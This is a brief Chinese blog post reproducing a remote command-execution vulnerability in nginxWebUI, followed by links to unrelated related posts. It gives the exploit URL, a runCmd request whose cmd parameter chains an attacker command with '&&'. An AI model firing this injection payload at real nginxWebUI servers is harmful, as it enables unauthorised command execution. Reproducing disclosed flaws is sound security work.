nginxWebUI runCmd命令执行漏洞复现

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
一只小白跳起来2 分钟前
重新安装VMware tools为灰色无法点击问题解决|读取电脑文件的共享文件夹方法
运维·ubuntu·vmware
长河9 分钟前
Kafka系列教程 - Kafka 运维 -8
运维·分布式·kafka
xyliiiiiL33 分钟前
一文总结常见项目排查
java·服务器·数据库
刘若水1 小时前
Linux: 进程信号初识
linux·运维·服务器
chem41112 小时前
Conmon lisp Demo
服务器·数据库·lisp
渗透测试老鸟-九青2 小时前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链
阳小江2 小时前
Docker知识点
运维·docker·容器
m0_555762902 小时前
QT 动态布局实现(待完善)
服务器·数据库·qt
极客柒3 小时前
RustDesk 开源远程桌面软件 (支持多端) + 中继服务器伺服器搭建 ( docker版本 ) 安装教程
服务器·docker·开源
只是橘色仍温柔3 小时前
xshell可以ssh连接,但vscode不行
运维·vscode·ssh